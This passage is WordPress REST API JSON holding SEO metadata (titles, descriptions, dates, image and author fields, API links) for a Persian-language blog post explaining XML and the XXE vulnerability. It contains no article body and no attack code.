\u0627\u0633\u0644\u0627\u06cc\u062f\"],\"inLanguage\":\"fa-IR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/\",\"name\":\"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/xxe-cover.jpg\",\"datePublished\":\"2021-05-19T13:31:26+00:00\",\"dateModified\":\"2022-02-05T12:01:43+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/56ec88338ff7cb5202779a216d9f3399\"},\"description\":\"XXE \u06cc\u0627 XML External Entities\u060c \u062f\u0631 \u0644\u06cc\u0633\u062a 10 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u062a\u0631 \u0628\u0631\u0627\u06cc \u0648\u0628\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0648 \u0628\u062e\u0634 \u0645\u0647\u0645\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0648\u0628\u060c \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE \u0647\u0633\u062a\u0646\u062f.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#breadcrumb\"},\"inLanguage\":\"fa-IR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fa-IR\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#primaryimage\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/xxe-cover.jpg\",\"contentUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/xxe-cover.jpg\",\"width\":800,\"height\":500,\"caption\":\"\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u062e\u0627\u0646\u0647\",\"item\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/\",\"name\":\"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646\",\"description\":\"\u0622\u062e\u0631\u06cc\u0646 \u0627\u062e\u0628\u0627\u0631\u060c\u0645\u0642\u0627\u0644\u0627\u062a \u0648 \u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fa-IR\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/56ec88338ff7cb5202779a216d9f3399\",\"name\":\"\u0627\u062f\u0645\u06cc\u0646\",\"description\":\"\u0639\u0644\u0627\u0642\u0645\u0646\u062f \u0628\u0647 \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0648 \u0622\u0634\u0646\u0627 \u0628\u0647 \u062d\u0648\u0632\u0647 \u062a\u0633\u062a \u0646\u0641\u0648\u0630\",\"sameAs\":[\"http:\\\/\\\/liangroup.net\",\"#\",\"https:\\\/\\\/x.com\\\/#\"],\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","description":"XXE \u06cc\u0627 XML External Entities\u060c \u062f\u0631 \u0644\u06cc\u0633\u062a 10 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u062a\u0631 \u0628\u0631\u0627\u06cc \u0648\u0628\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0648 \u0628\u062e\u0634 \u0645\u0647\u0645\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0648\u0628\u060c \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE \u0647\u0633\u062a\u0646\u062f.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/liangroup.net\/blog\/what-is-xxe\/","og_locale":"fa_IR","og_type":"article","og_title":"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f","og_description":"XXE \u06cc\u0627 XML External Entities\u060c \u062f\u0631 \u0644\u06cc\u0633\u062a 10 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u062a\u0631 \u0628\u0631\u0627\u06cc \u0648\u0628\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0648 \u0628\u062e\u0634 \u0645\u0647\u0645\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0648\u0628\u060c \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE \u0647\u0633\u062a\u0646\u062f.","og_url":"https:\/\/liangroup.net\/blog\/what-is-xxe\/","og_site_name":"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","article_author":"#","article_published_time":"2021-05-19T13:31:26+00:00","article_modified_time":"2022-02-05T12:01:43+00:00","og_image":[{"width":800,"height":500,"url":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xxe-cover.jpg","type":"image\/jpeg"}],"author":"\u0627\u062f\u0645\u06cc\u0646","twitter_card":"summary_large_image","twitter_creator":"@#","twitter_site":"@liansecurity","twitter_misc":{"\u0646\u0648\u0634\u062a\u0647\u200c\u0634\u062f\u0647 \u0628\u062f\u0633\u062a":"\u0627\u062f\u0645\u06cc\u0646","\u0632\u0645\u0627\u0646 \u062a\u0642\u0631\u06cc\u0628\u06cc \u0628\u0631\u0627\u06cc \u062e\u0648\u0627\u0646\u062f\u0646":"29 \u062f\u0642\u06cc\u0642\u0647"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/#article","isPartOf":{"@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/"},"author":{"name":"\u0627\u062f\u0645\u06cc\u0646","@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/56ec88338ff7cb5202779a216d9f3399"},"headline":"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f","datePublished":"2021-05-19T13:31:26+00:00","dateModified":"2022-02-05T12:01:43+00:00","mainEntityOfPage":{"@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/"},"wordCount":959,"commentCount":0,"image":{"@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/#primaryimage"},"thumbnailUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xxe-cover.jpg","articleSection":["\u062a\u0633\u062a \u0646\u0641\u0648\u0630 \u0648 \u0627\u0645\u0646\u06cc\u062a","\u0645\u0642\u0627\u0644\u0627\u062a \u062a\u0633\u062a \u0646\u0641\u0648\u0630","\u06cc\u06cc\u06cc\u06cc \u0627\u0633\u0644\u0627\u06cc\u062f"],"inLanguage":"fa-IR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/liangroup.net\/blog\/what-is-xxe\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/","url":"https:\/\/liangroup.net\/blog\/what-is-xxe\/","name":"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","isPartOf":{"@id":"https:\/\/liangroup.net\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/#primaryimage"},"image":{"@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/#primaryimage"},"thumbnailUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xxe-cover.jpg","datePublished":"2021-05-19T13:31:26+00:00","dateModified":"2022-02-05T12:01:43+00:00","author":{"@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/56ec88338ff7cb5202779a216d9f3399"},"description":"XXE \u06cc\u0627 XML External Entities\u060c \u062f\u0631 \u0644\u06cc\u0633\u062a 10 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u062a\u0631 \u0628\u0631\u0627\u06cc \u0648\u0628\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0648 \u0628\u062e\u0634 \u0645\u0647\u0645\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0648\u0628\u060c \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE \u0647\u0633\u062a\u0646\u062f.","breadcrumb":{"@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/#breadcrumb"},"inLanguage":"fa-IR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/liangroup.net\/blog\/what-is-xxe\/"]}]},{"@type":"ImageObject","inLanguage":"fa-IR","@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/#primaryimage","url":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xxe-cover.jpg","contentUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xxe-cover.jpg","width":800,"height":500,"caption":"\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE"},{"@type":"BreadcrumbList","@id":"https:\/\/liangroup.net\/blog\/what-is-xxe\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u062e\u0627\u0646\u0647","item":"https:\/\/liangroup.net\/blog\/"},{"@type":"ListItem","position":2,"name":"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f"}]},{"@type":"WebSite","@id":"https:\/\/liangroup.net\/blog\/#website","url":"https:\/\/liangroup.net\/blog\/","name":"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","description":"\u0622\u062e\u0631\u06cc\u0646 \u0627\u062e\u0628\u0627\u0631\u060c\u0645\u0642\u0627\u0644\u0627\u062a \u0648 \u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/liangroup.net\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fa-IR"},{"@type":"Person","@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/56ec88338ff7cb5202779a216d9f3399","name":"\u0627\u062f\u0645\u06cc\u0646","description":"\u0639\u0644\u0627\u0642\u0645\u0646\u062f \u0628\u0647 \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0648 \u0622\u0634\u0646\u0627 \u0628\u0647 \u062d\u0648\u0632\u0647 \u062a\u0633\u062a \u0646\u0641\u0648\u0630","sameAs":["http:\/\/liangroup.net","#","https:\/\/x.com\/#"],"url":"https:\/\/liangroup.net\/blog\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts\/11057","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/comments?post=11057"}],"version-history":[{"count":0,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts\/11057\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/media\/11093"}],"wp:attachment":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/media?parent=11057"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/categories?post=11057"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/tags?post=11057"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}